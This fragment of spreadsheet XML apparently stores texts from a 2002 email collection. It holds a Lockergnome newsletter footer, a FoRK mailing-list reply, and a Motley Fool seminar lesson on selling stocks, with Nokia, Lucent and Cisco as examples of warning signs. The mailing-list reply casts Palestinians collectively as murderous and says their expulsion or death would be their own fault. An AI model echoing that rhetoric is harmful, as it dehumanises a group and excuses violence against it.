 &amp;copy;2002, Sausage Software and Lockergnome LLC. All Rights Reserved. Nathan Allan, the Sausage Crew and Lockergnome Lunatics spin all the content. Please read our &lt;a href="http://www.lockergnome.com/terms.html"&gt;Terms of Service&lt;/a&gt;.
 &lt;!-- FUNNY COMMENT    --&gt;
 &lt;/font&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;Search Past Issues:&lt;br&gt;
 &lt;img src="http://www.lockergnome.com/images/blank.gif"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&lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#FFEEDD"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&lt;table cellpadding="5" cellspacing="1" border="0"&gt;&lt;tr&gt;&lt;td title="Click These Links to find your DREAM JOB!"&gt;&lt;font style="font-size: 8pt; font-family: Verdana"&gt;
 &lt;center&gt;&lt;b&gt;GETTING PAID WHAT YOU ARE WORTH?&lt;/b&gt;&lt;p&gt; Change your career - or get a better one! Your &lt;a href="http://www.lockergnome.com/jobs.html"&gt;dream job&lt;/a&gt; could be a mouse click away. Visit our &lt;a href="http://www.lockergnome.com/jobs.html"&gt;job search&lt;/a&gt; page for a position with a future.&lt;p&gt; &lt;a href="http://www.lockergnome.com/jobs.html"&gt;Find a new career&lt;/a&gt; today!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">When a settler goes postal and kills some Palestinians they are treated
 as a criminal, not celebrated in word and song.
 But you knew that.
 When a Palestinian sets out, to great rejoicing, to attempt to target
 children with a homicide-bomb, they are careful to dip the shrapnel in
 rat poison.  It helps prevent blood clotting in the victims, you see.
 I'm sure all those Jewish homicide-bombers do the same.  Oh wait, there
 aren't any.
 If the Palestinians are driven completely out, either by expulsion or
 death, they will have nobody to blame but themselves.  That won't stop
 them or you from pretending otherwise.
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Owen
 &gt; Byrne
 &gt; I'm sure the plan is that it will be renamed for the settler who kills
 &gt; the last Palestinian in a few years.
 &gt; 
 &gt; Owen
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: When to Sell Online Seminar, Lesson 2: Companies Gone Wrong
</t>
  </si>
  <si>
    <t xml:space="preserve">******************************************************************* 
 IF YOU ARE READING THIS, YOU MAY NOT HAVE A MIME VERSION 1.0
 COMPATIBLE MAIL READER. TO CONVERT YOUR SUBSCRIPTION TO PLAIN
 TEXT OR TO UNSUBSCRIBE, SEND AN EMAIL TO otto@fool.com OR VISIT
 http://www.fool.com/community/freemail/freemaillogin.asp
 *******************************************************************
 --Groovy-Foolish-Boundary-2A6F4DA4EE1F4ABCB782
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 =================================================================
                  THE MOTLEY FOOL ONLINE SEMINAR
            WHEN TO SELL: THE FOOLISH SELLING STRATEGY
 =================================================================
 SEMINAR RESOURCES
 =================================================================
 START PAGE
 http://www.fool.com/m.asp?i=690047
 ORIENTATION
 http://www.fool.com/m.asp?i=690048
 DOWNLOADS
 http://www.fool.com/m.asp?i=690049
 LESSON RESOURCES
 http://www.fool.com/m.asp?i=690050
 DISCUSSION BOARD INTRO
 http://www.fool.com/m.asp?i=690051
 DISCUSSION BOARD FAQ
 http://www.fool.com/m.asp?i=690052
 HOW DO I...?
 http://www.fool.com/m.asp?i=690053
 CHOOSE YOUR TEAM
 http://www.fool.com/m.asp?i=690054
 =================================================================
 LESSON 2: COMPANIES GONE WRONG
 Instructors: Bill Mann, TMF Otter (with Matt Richey, TMF Matt)
 http://www.fool.com/m.asp?i=690055
 http://www.fool.com/m.asp?i=690056
 In Lesson 1, we offered a list of red flags that trigger instant
 sales. These things are pretty easy to spot, if you keep up with
 current events surrounding the companies you hold.
 Notice that we didn't spend much (meaning any) time discussing
 Wall Street analyst upgrades or downgrades. This is for one
 reason: We don't care what analysts think, and we certainly
 don't put any credence in their deeply compromised ratings systems.
 Sure, we read analyst research. After all, many analysts have
 significantly more access to business management than we ever
 will as individual investors, so they can have some valuable
 insights. But if you want to watch a much better predictor of
 company trouble than analyst rating systems, watch the bond
 market (more on this later). "Strong buy?" Pfffffft.
 In this lesson, we look specifically at signs that a company is
 slipping. Investors need to remember one key point: For highly
 valued companies, it only takes a small slip to lead to a large
 share price decline. For example, a company priced at a multiple
 of 30 times earnings is expected to grow faster than one that is
 priced at 15 times. As a result, investors in the high-multiple
 company are much more likely to be traumatized if its business
 starts to show slowing growth (in earnings, sales, cash flows,
 whatever). Thus, with highly valued companies in particular,
 it's important to be vigilant in monitoring any slips. Even a
 company that's growing nicely may be sending clear sell signals.
 So let's look at a few instances where companies have started to
 go wrong. Our goal here is to learn how to recognize the warning
 signs of an impending stock collapse before it happens.
 WARNING SIGN 1: SLOWING SALES GROWTH
 Through 2000, Nokia (NYSE: NOK) could do no wrong. It was one of
 the fastest-growing stocks in the '90s and the largest, best
 capitalized participant in one of the hottest sectors of the
 market: wireless telecommunications. In 2000, Nokia posted
 revenue gains well in excess of 50% each quarter. Then, in April
 2001, it hit a clunker -- 22% growth, followed by 5% growth the
 next quarter. For investors in a high-multiple (high P/E)
 company, this is rough. For most companies, a second quarter in
 a row of dramatically slowing sales is enough. Get out. For a
 barnburner like Nokia, one is enough.
 Some words of wisdom: Keep companies in one of the hottest
 sectors on a very short leash. Hot sectors cool off -- they
 always do. Remember, railroads were once the hot sector, then
 canals, car companies, radios, and so on. It ends. Be ready. If
 you're expecting sales to continue roaring full-steam ahead and
 they don't, it's time to position your finger on the sell
 trigger. If sales growth slows unexpectedly, be prepared to give
 a company one quarter to bring up its performance. But unload on
 the second straight quarter of slowing sales, measured on a
 year-over-year basis. (Always compare the quarterly growth on a
 year-over-year basis -- a comparison of sequential quarterly
 growth is a worthless measure. Seasonal effects can skew
 sequential growth.)
 WARNING SIGN 2: DIVERGENT SALES AND PROFIT GROWTH
 By April 2001, Nokia had shed some 60% of its peak value. Signs
 were surely evident in advance, right? Why, yes. Companies
 growing top lines (sales) should generally be growing bottom
 lines (earnings) at a similar clip. Even though Nokia's sales
 were growing through 2000 at 50%-plus per quarter, at the end
 of the year, net profit growth dropped suddenly from around 70%
 to 40%.
 Profits recovered slightly in the fourth quarter, only to
 collapse in the first two quarters of 2001. The economics
 changed quickly, and with a hyper-growth company, the stock
 reacted just as fast. Even those not deeply versed in the
 technology and economics of the mobile phone industry could see
 signs that something was wrong.
 WARNING SIGN 3: PLUMMETING CASH FLOWS
 In 1999, Lucent (NYSE: LU) looked beautiful from an earnings
 perspective, but horrible from a cash flow perspective. We look
 at two numbers: operating cash flow and free cash flow. Free
 cash flow can be low for growing companies, as they have
 significant capital investment demands, but low operating cash
 flow is inexcusable. Lucent's experiences are telling. In 1999,
 Lucent's full-year earnings came out at a gaudy $4.7 billion,
 based upon $38 billion in revenue. The company was on top of the
 world, and it was, at the time, the largest telecommunications
 equipment company by market cap, at $260 billion.
 http://www.fool.com/m.asp?i=690057
 http://www.fool.com/m.asp?i=690058
 But as Matt and I detailed in January 2000, big troubles were
 afoot, lurking in the company's cash flow statement. On an
 operating cash flow basis for fiscal 1999, the company lost
 $276 million. That's a far cry from the $4.7 billion in
 reported net income. And on top of that, Lucent had more than
 $2.2 billion in capital expenditures. Thus, the difference
 between Lucent's earnings and its free cash flow (operating
 cash flow minus capital expenditures) was an amazing $7.3
 billion, and not in a good way.
 http://www.fool.com/m.asp?i=690059
 The investor who picked up on this scary dichotomy could have
 saved herself losses in excess of 98%. (As an aside, since 1999,
 Lucent has gone on to restate its 1999 cash flow not once, but
 twice, and in the most recent 10-K, the 1999 operating cash flow
 is reported as a loss of $1.8 billion.)
 And get this -- you'll see nearly the exact same thing on
 Enron's old financial statements. Cooked books or no, they
 weren't generating much cash. In fact, they were destroying it.
 WARNING SIGN 4: WATCH THOSE BONDS
 Remember what we said about ignoring analysts? Well, it's
 because their information can be quite conflicted, and it's
 almost impossible to tell if any one individual has your best
 interests in mind. Fortunately, another group can give you the
 same type of signals: investors who hold a company's bonds.
 Bondholders buy a piece of a company's debt and are generally
 paid interest on this obligation by the company. Watch the
 current price of a bond, and it will tell you the current odds
 bondholders are giving to that obligation being paid. I
 recommend keeping a log sheet where you write down the price of
 the bond. Download it here. If you see a drop, the bondholders
 are growing pessimistic. You might even see this at the same
 time analysts are shouting, "Strong buy!"
 http://www.fool.com/m.asp?i=690060
 http://www.fool.com/m.asp?i=690061
 I recommend the Yahoo! Bond Center. You can search on any company
 and get a list of existing bonds. Find a bond with a maturity
 between five and 10 years hence. Check the price. A bond priced
 at 100 is at "par," which means that the bond's face-value
 interest rate fairly compensates the investor for the risk. Some
 bonds are priced above 100, meaning the interest yield will be
 lower than face value. These are considered to be very low risk.
 But some are priced below face value, even way below.
 http://www.lnksrv.com/m.asp?i=690062
 As of this writing, WorldCom (Nasdaq: WCOME) bonds are priced at
 18, which means that bondholders assume there's little chance
 they'll be paid. Tyco (NYSE: TYC), for all of its recent
 problems and high levels of debt, has 6.75% interest bonds, with
 2011 maturity priced at 83. That's a discount to face, but not
 one that alludes to an imminent default. Qwest (NYSE: Q) sports
 a price of 85 on its 7.25% 2011 bonds, even closer to par than
 Tyco. These prices don't indicate healthy companies, but they
 don't insinuate imminent default or bankruptcy either.
 WARNING SIGN 5: "IT JUST DOESN'T GET ANY BETTER"
 For a brief time in 2000, Cisco Systems (Nasdaq: CSCO) was the
 largest company in the world by market capitalization. This
 should have been a warning. As I wrote in May 2000 when the
 stock was around $57, Cisco's valuation of nearly $400 billion
 implied that investors expected the company's earnings to reach
 $34 billion in 2010. Yet no company had ever generated earnings
 higher than $12 billion in a single year.
 http://www.fool.com/m.asp?i=690063
 As it turned out, I almost perfectly called the top for Cisco --
 it has shed nearly $300 billion in market cap since that
 article. Only those that decided it couldn't possibly get any
 better achieved a sale near the high watermark. Cisco showed no
 signs of a decline. For the quarter that ended Jan. 29, 2000,
 Cisco turned in sales of $4.3 billion, as compared to $2.8
 billion for the same quarter the year before -- a growth rate of
 53%. The following quarter was 58% higher, then 62% higher, then
 66% higher.
 Only Cisco's stock price rise could beat these numbers. Imagine
 a $385 billion company with a P/E of 156! The assumptions for
 future growth were mind-bending, though at the time, in the
 midst of the data revolution, they seemed plausible. As
 investors, we must be on the correct side of probabilities.
 Taking a portion of our Cisco investment off the table, at this
 point, would've been a smart choice. Remember, Cisco's business
 was fine in 2000, but the enterprising investor knows that a lot
 has to be right for the situation to work out.
 HOMEWORK
 For this lesson, we ask you to do the same thing as we did after
 Lesson 1. Pick a company -- maybe even the same company you
 looked at last time -- to continue studying. For your company,
 do the following:
 - Track the year-over-year sales growth for each of the past four
   quarters and three fiscal years. Is growth accelerating,
   staying about the same, or weakening?
 - Track the year-over-year net income growth for each of the past
   four quarters and three fiscal years. Is net income growing
   slower or faster than sales? Is there a trend to these figures?
 - Track your company's operating cash flow for each of the past
   three fiscal years. Is it lower or higher than reported net
   income for the corresponding year? (We're not having you look
   at quarterly cash flow because those figures can bounce around
   due to the timing of payments. Annual cash flow data is much
   more indicative of real cash flow trends.)
 - If your company has long-term debt, go the Yahoo! Bond Center
   and check the price of your company's bonds. (If you don't know
   whether your company has any debt, just type your company name
   into the bond center and see if any debt shows up.)
   http://www.lnksrv.com/m.asp?i=690064
 - Finally, examine your company's market cap relative to its
   current net income over the past year. What's the P/E ratio? Is
   there reason to believe your company has every rosy scenario
   already priced into its stock? (In the current bear market,
   this is much less likely than it was a few years ago, but it's
   still a question you should consider.)
 To help you out, we've put together the Foolish Stock Information
 Form to track all of your research and information about your
 stocks. You can get to by clicking here. We've also outlined how
 to find all of the information above, here.
 http://www.fool.com/m.asp?i=690065
 http://www.fool.com/m.asp?i=690066
 So dust off the old calculator, find your company's financials,
 and get to work. Quarterly financial data is best found in
 company 10-Qs, and annual data is best found in company 10-Ks.
 You should be able to find all of this information using
 financials from either the company website or at Fool.com on the
 Quotes &amp; Data area.
 http://www.fool.com/m.asp?i=690067
 FEELING A LITTLE LOST?
 If you're new to using SEC filings, read this overview of
 financial statements. Above all else, just do your best. Once
 you've done what you can, report your findings to your teammates!
 We've also put together an ongoing list of resources so you can
 dive in a little deeper. You can click on the "Lesson Resources"
 link in the right column or click here to find more resources to
 help you better understand financial statements, general
 investing equations, and stock options.
 http://www.fool.com/m.asp?i=690068
 http://www.fool.com/m.asp?i=690069
 Matt and I will be joining you on the boards with our own
 analyses, so you can examine our processes.
 http://www.fool.com/m.asp?i=690070
 Fool on!
 Bill and Matt
 =================================================================
 LESSON PLAN
 =================================================================
 Lesson 1: On Selling
 http://www.fool.com/m.asp?i=690071
 Lesson 2: Companies Gone Wrong
 http://www.fool.com/m.asp?i=690072
 Lesson 3: Gut Checks and Safety Valves
 Lesson 4: When a Company Becomes Overvalued
 Lesson 5: Report Card Part 1 - Business Prospects
 Lesson 6: Report Card Part 2 - Valuation
 Lesson 7: Panning for Panera
 Lesson 8: The Report in Action - Johnson &amp; Johnson
 =================================================================
 This Seminar contains the opinions and ideas of The Motley Fool.
 It is provided with the understanding that The Motley Fool is not
 engaged in rendering financial or other professional services.
 The Motley Fool specifically disclaims any responsibility for
 any liability, loss, or risk, personal or otherwise, which is
 incurred as a consequence, directly or indirectly, of the use
 and application of any of the contents of this Seminar.
 Copyright (c) 1995-2002 The Motley Fool. All rights reserved.
 Legal Information: http://www.fool.com/m.asp?i=554475
 --Groovy-Foolish-Boundary-2A6F4DA4EE1F4ABCB782
 Content-Type: text/html
 Content-Disposition: inline
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html" /&gt;
 &lt;title&gt;The Motley Fool Online Seminar: When To Sell: The Foolish Selling Strategy&lt;/title&gt;
 &lt;meta name="STORY_UID" content="188082" /&gt;
 &lt;map name="Seminar_EV_navbar_Map"&gt;
 &lt;area shape="rect" coords="473,0,624,27" href="http://www.fool.com/m.asp?i=690007" /&gt;
 &lt;area shape="rect" coords="315,0,470,27" href="http://www.fool.com/m.asp?i=690008" /&gt;
 &lt;area shape="rect" coords="157,0,312,27" href="http://www.fool.com/m.asp?i=690027"&gt;
 &lt;/area&gt;
 &lt;area shape="rect" coords="0,0,155,27" href="http://www.fool.com/m.asp?i=690009" /&gt;
 &lt;/map&gt;
 &lt;map name="Seminar_EV_navbar_Map_sm"&gt;
 &lt;area shape="rect" coords="396,3,546,22" href="http://www.fool.com/m.asp?i=690010" /&gt;
 &lt;area shape="rect" coords="236,4,389,22" href="http://www.fool.com/m.asp?i=690011" /&gt;
 &lt;area shape="rect" coords="78,3,231,23" href="http://www.fool.com/m.asp?i=690028"&gt;
 &lt;/area&gt;
 &lt;/map&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#003366" link="#003366" vlink="#003366" alink="#ff0000"&gt;
 &lt;div align="center"&gt;
 &lt;table width="638" border="0" cellpadding="0" cellspacing="0"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_TL.gif" width="6" height="7" /&gt;&lt;/td&gt;
 &lt;td background="http://g.fool.com/art/new/seminars/templates/EV_Top.gif" height="7"&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="7" alt="" /&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_TR.gif" width="6" height="7" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr bgcolor="#336699"&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_Title_L.gif" width="6" height="64" /&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;table width="624" cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_logo.gif" width="161" height="64" /&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/new/seminars/titles/WTSTitle.gif" border="0" alt="When To Sell: The Foolish Selling Strategy" /&gt;&lt;/td&gt;
 &lt;td width="100%" /&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_Title_R.gif" width="6" height="64" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_navbar_L.gif" width="6" height="27" /&gt;&lt;/td&gt;
 &lt;td bgcolor="#999966" align="center"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_navbar.gif" width="626" height="27" border="0" alt="" usemap="#Seminar_EV_navbar_Map" /&gt;&lt;/td&gt;
 &lt;td valign="top"&gt;&lt;img src="http://g.fool.com/art/new/seminars/templates/EV_navbar_R.gif" width="6" height="27" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="6" bgcolor="#ffffff"&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="6" height="1" alt="" /&gt;&lt;/td&gt;
 &lt;td valign="top" bgcolor="#ffffff"&gt;
 &lt;table width="626" cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#ffffff" valign="top"&gt;
 &lt;table cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://g.fool.com/art/spacer.gif" width="1" height="12" alt="" /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellspacing="0" cellpadding="10" border="0"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face="arial,helvetica,geneva,sans-serif" size="+1"&gt;
 &lt;b&gt;Lesson 2: Companies Gone Wrong&lt;/b&gt;
 &lt;/font&gt;
 &lt;br /&gt;
 &lt;font face="arial,helvetica,geneva,sans-serif" size="3"&gt;
 &lt;b&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;br /&gt;
 &lt;font face="verdana,arial,geneva,sans-serif" size="-1"&gt;
 &lt;b&gt;Instructors:&lt;/b&gt;
 &lt;a href="http://www.fool.com/m.asp?i=690012"&gt;
 Bill Mann, TMF Otter&lt;/a&gt; (with &lt;a href="http://www.fool.com/m.asp?i=690013"&gt;Matt Richey, TMF Matt&lt;/a&gt;)
 &lt;br /&gt;&lt;br /&gt;
 &lt;P&gt;In Lesson 1, we offered a list of red flags that trigger instant sales. These things are pretty easy to spot, if you keep up with current events surrounding the companies you hold.
 &lt;BR&gt;&lt;BR&gt;Notice that we didn't spend much (meaning any) time discussing Wall Street analyst upgrades or downgrades. This is for one reason: We don't care what analysts think, and we certainly don't put any credence in their deeply compromised ratings systems.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;Sure, we read analyst research. After all, many analysts have significantly more access to business management than we ever will as individual investors, so they can have some valuable insights. But if you want to watch a much better predictor of company trouble than analyst rating systems, watch the bond market (more on this later). "Strong buy?" Pfffffft.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;In this lesson, we look specifically at signs that a company is slipping. Investors need to remember one key point: For highly valued companies, it only takes a small slip to lead to a large share price decline. For example, a company priced at a multiple of 30 times earnings is expected to grow faster than one that is priced at 15 times. As a result, investors in the high-multiple company are much more likely to be traumatized if its business starts to show slowing growth (in earnings, sales, cash flows, whatever). Thus, with highly valued companies in particular, it's important to be vigilant in monitoring any slips. Even a company that's growing nicely may be sending clear sell signals.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;So let's look at a few instances where companies have started to go wrong. Our goal here is to learn how to recognize the warning signs of an impending stock collapse before it happens.&lt;/P&gt;
 &lt;P&gt;&lt;STRONG&gt;&lt;STRONG&gt;&lt;/STRONG&gt;&lt;/STRONG&gt;&lt;/P&gt;
 &lt;P&gt;&lt;STRONG&gt;Warning sign 1: Slowing sales growth &lt;BR&gt;&lt;/STRONG&gt;Through 2000, &lt;STRONG&gt;Nokia&lt;/STRONG&gt; (NYSE: NOK) could do no wrong. It was one of the fastest-growing stocks in the '90s and the largest, best capitalized participant in one of the hottest sectors of the market: wireless telecommunications. In 2000, Nokia posted revenue gains well in excess of 50% each quarter. Then, in April 2001, it hit a clunker -- 22% growth, followed by 5% growth the next quarter. For investors in a high-multiple (high P/E) company, this is rough. For most companies, a second quarter in a row of dramatically slowing sales is enough. Get out. For a barnburner like Nokia, one is enough.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;Some words of wisdom: Keep companies in one of the hottest sectors on a very short leash. Hot sectors cool off -- they always do. Remember, railroads were once the hot sector, then canals, car companies, radios, and so on. It ends. Be ready. If you're expecting sales to continue roaring full-steam ahead and they don't, it's time to position your finger on the sell trigger. If sales growth slows unexpectedly, be prepared to give a company one quarter to bring up its performance. But unload on the second straight quarter of slowing sales, measured on a year-over-year basis. (Always compare the quarterly growth on a year-over-year basis -- a comparison of sequential quarterly growth is a worthless measure. Seasonal effects can skew sequential growth.)&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;&lt;STRONG&gt;Warning sign 2: Divergent sales and profit growth &lt;BR&gt;&lt;/STRONG&gt;By April 2001, Nokia had shed some 60% of its peak value. Signs were surely evident in advance, right? Why, yes. Companies growing top lines (sales) should generally be growing bottom lines (earnings) at a similar clip. Even though Nokia's sales were growing through 2000 at 50%-plus per quarter, at the end of the year, net profit growth dropped suddenly from around 70% to 40%.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;Profits recovered slightly in the fourth quarter, only to collapse in the first two quarters of 2001. The economics changed quickly, and with a hyper-growth company, the stock reacted just as fast. Even those not deeply versed in the technology and economics of the mobile phone industry could see signs that something was wrong. &lt;EM&gt;&lt;EM&gt;&lt;/EM&gt;&lt;/EM&gt;&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;&lt;STRONG&gt;Warning sign 3: Plummeting cash flows&lt;BR&gt;&lt;/STRONG&gt;In 1999, &lt;STRONG&gt;Lucent&lt;/STRONG&gt; (NYSE: LU) looked beautiful from an earnings perspective, but horrible from a cash flow perspective. We look at two numbers: &lt;A href="http://www.fool.com/m.asp?i=690014"&gt;operating cash flow&lt;/A&gt; and &lt;A href="http://www.fool.com/m.asp?i=690015"&gt;free cash flow&lt;/A&gt;. Free cash flow can be low for growing companies, as they have significant capital investment demands, but low operating cash flow is inexcusable. Lucent's experiences are telling. In 1999, Lucent's full-year earnings came out at a gaudy $4.7 billion, based upon $38 billion in revenue. The company was on top of the world, and it was, at the time, the largest telecommunications equipment company by market cap, at $260 billion.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;But as Matt and I &lt;A href="http://www.fool.com/m.asp?i=690016"&gt;detailed in January 2000&lt;/A&gt;, big troubles were afoot, lurking in the company's cash flow statement. On an operating cash flow basis for fiscal 1999, the company &lt;EM&gt;lost&lt;/EM&gt; $276 million. That's a far cry from the $4.7 billion in reported net income. And on top of that, Lucent had more than $2.2 billion in capital expenditures. Thus, the difference between Lucent's earnings and its free cash flow (operating cash flow minus capital expenditures) was an amazing $7.3 billion, and not in a good way.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;The investor who picked up on this scary dichotomy could have saved herself losses in excess of 98%. (As an aside, since 1999, Lucent has gone on to restate its 1999 cash flow not once, but twice, and in the most recent 10-K, the 1999 operating cash flow is reported as a loss of &lt;EM&gt;$1.8 billion&lt;/EM&gt;.)&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;And get this -- you'll see nearly the exact same thing on Enron's old financial statements. Cooked books or no, they weren't generating much cash. In fact, they were destroying it.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;&lt;STRONG&gt;Warning sign 4: Watch those bonds&lt;/STRONG&gt; &lt;BR&gt;Remember what we said about ignoring analysts? Well, it's because their information can be quite conflicted, and it's almost impossible to tell if any one individual has your best interests in mind. Fortunately, another group can give you the same type of signals: investors who hold a company's bonds.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;Bondholders buy a piece of a company's debt and are generally paid interest on this obligation by the company. Watch the current price of a bond, and it will tell you the current odds bondholders are giving to that obligation being paid. I recommend keeping a &lt;A href="http://www.fool.com/m.asp?i=690017"&gt;log sheet&lt;/A&gt; where you write down the price of the bond. &lt;A href="http://www.fool.com/m.asp?i=690018"&gt;Download it here&lt;/A&gt;. If you see a drop, the bondholders are growing pessimistic. You might even see this at the same time analysts are shouting, "Strong buy!"&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;I recommend the &lt;A href="http://www.lnksrv.com/m.asp?i=690019"&gt;Yahoo! Bond Center&lt;/A&gt;. You can search on any company and get a list of existing bonds. Find a bond with a maturity between five and 10 years hence. Check the price. A bond priced at 100 is at "par," which means that the bond's face-value interest rate fairly compensates the investor for the risk. Some bonds are priced above 100, meaning the interest yield will be lower than face value. These are considered to be very low risk. But some are priced below face value, even &lt;EM&gt;way&lt;/EM&gt; below.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;As of this writing, &lt;STRONG&gt;WorldCom&lt;/STRONG&gt; (Nasdaq: WCOME) bonds are priced at 18, which means that bondholders assume there's little chance they'll be paid. &lt;STRONG&gt;Tyco&lt;/STRONG&gt; (NYSE: TYC), for all of its recent problems and high levels of debt, has 6.75% interest bonds, with 2011 maturity priced at 83. That's a discount to face, but not one that alludes to an imminent default. &lt;STRONG&gt;Qwest&lt;/STRONG&gt; (NYSE: Q) sports a price of 85 on its 7.25% 2011 bonds, even closer to par than Tyco. These prices don't indicate healthy companies, but they don't insinuate imminent default or bankruptcy either.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;&lt;STRONG&gt;Warning sign 5: "It just doesn't get any better"&lt;/STRONG&gt; &lt;BR&gt;For a brief time in 2000, &lt;STRONG&gt;Cisco Systems&lt;/STRONG&gt; (Nasdaq: CSCO) was the largest company in the world by market capitalization. This should have been a warning. &lt;A href="http://www.fool.com/m.asp?i=690020"&gt;As I wrote&lt;/A&gt; in May 2000 when the stock was around $57, Cisco's valuation of nearly $400 billion implied that investors expected the company's earnings to reach $34 billion in 2010. Yet no company had &lt;EM&gt;ever&lt;/EM&gt; generated earnings higher than $12 billion in a single year.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;As it turned out, I almost perfectly called the top for Cisco -- it has shed nearly $300 billion in market cap since that article. Only those that decided it couldn't possibly get any better achieved a sale near the high watermark. Cisco showed no signs of a decline. For the quarter that ended Jan. 29, 2000, Cisco turned in sales of $4.3 billion, as compared to $2.8 billion for the same quarter the year before -- a growth rate of 53%. The following quarter was 58% higher, then 62% higher, then 66% higher.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;Only Cisco's stock price rise could beat these numbers. Imagine a $385 billion company with a P/E of 156! The assumptions for future growth were mind-bending, though at the time, in the midst of the data revolution, they seemed plausible. As investors, we must be on the correct side of probabilities. Taking a portion of our Cisco investment off the table, at this point, would've been a smart choice. Remember, Cisco's business was fine in 2000, but the enterprising investor knows that a lot has to be right for the situation to work out.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;&lt;STRONG&gt;Homework&lt;BR&gt;&lt;/STRONG&gt;For this lesson, we ask you to do the same thing as we did after Lesson 1. Pick a company -- maybe even the same company you looked at last time -- to continue studying. For your company, do the following:&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;UL&gt;
 &lt;LI&gt;Track the year-over-year sales growth for each of the past four quarters and three fiscal years. Is growth accelerating, staying about the same, or weakening?
 &lt;BR&gt;&lt;BR&gt;
 &lt;LI&gt;Track the year-over-year net income growth for each of the past four quarters and three fiscal years. Is net income growing slower or faster than sales? Is there a trend to these figures?
 &lt;BR&gt;&lt;BR&gt;
 &lt;LI&gt;Track your company's operating cash flow for each of the past three fiscal years. Is it lower or higher than reported net income for the corresponding year? (We're not having you look at quarterly cash flow because those figures can bounce around due to the timing of payments. Annual cash flow data is much more indicative of real cash flow trends.)
 &lt;BR&gt;&lt;BR&gt;
 &lt;LI&gt;If your company has long-term debt, go the &lt;A href="http://www.lnksrv.com/m.asp?i=690021"&gt;Yahoo! Bond Center&lt;/A&gt; and check the price of your company's bonds. (If you don't know whether your company has any debt, just type your company name into the bond center and see if any debt shows up.)
 &lt;BR&gt;&lt;BR&gt;
 &lt;LI&gt;Finally, examine your company's market cap relative to its current net income over the past year. What's the P/E ratio? Is there reason to believe your company has every rosy scenario already priced into its stock? (In the current bear market, this is much less likely than it was a few years ago, but it's still a question you should consider.) &lt;/LI&gt;&lt;/UL&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;To help you out, we've put together the &lt;STRONG&gt;Foolish Stock Information Form&lt;/STRONG&gt; to track all of your research and information about your stocks. You can get to by &lt;A href="http://www.fool.com/m.asp?i=690022"&gt;clicking here&lt;/A&gt;. We've also outlined how to find all of the information above, &lt;a href="http://www.fool.com/m.asp?i=690023"&gt;here&lt;/a&gt;.&lt;/P&gt;
 &lt;P&gt;&lt;/P&gt;
